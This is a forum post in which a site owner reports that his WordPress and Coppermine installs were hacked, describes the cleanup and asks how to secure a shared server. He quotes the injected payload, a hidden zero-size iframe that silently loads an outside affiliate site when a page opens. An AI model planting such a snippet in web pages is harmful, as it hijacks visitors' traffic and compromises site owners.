Code: Select all
,Code: Select all
and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
There's an exploit out there and if your site gets hacked chances are you won't even know it.
The hack inserts code into php and html files. In my case two apps were hacked on my site yesterday - one was the WordPress Blog, the other was a php image gallery, Coppermine.
What code was inserted?:
[syntax="html"]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>Very simple. Get yourself a nice search and replace utility that does batch replaces and replace the code leaving the replace field blank. Or write a script to do it on the server.
The problem? They'll be back.
So can any experts out there, I"m just a photographer, shed some light on a how client sider like me can secure his shared server (Apache) from these cybertrash kiddies and their sick bots?
Any suggestions would be greatly appreciated. I run many PhP applications including PixelPost and PhPbb but only coppermine and wordpress were infected. It seems that the CMS community is very hush hush on these exploits - bad publicity for them - and as I said before, most users (probably thousands of them) don't know the code is there unless it breaks an application by busting up the code.
Thanks in advance.
edit: I should have added that the code doesn't try to break the site, it just redirects traffic in the background to generate ad revenue i guess..if you watch the status bar you will see all kinds of transfers going on while the page loads. In some cases it does break it unwittingly, for example it caused IE to read my CSS wrong and send my WP Sidebar to the bottom..that was the tipoff for me.
feyd | Please use[/syntax]
Code: Select all
,Code: Select all
and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
[quote="[url=http://forums.devnetwork.net/viewtopic.php?t=30037]Forum Rules[/url] Section 1.1"][b]2.[/b] Use descriptive subjects when you start a new thread. Vague titles such as "Help!", "Why?" are misleading and keep you from receiving an answer to your question.[/quote]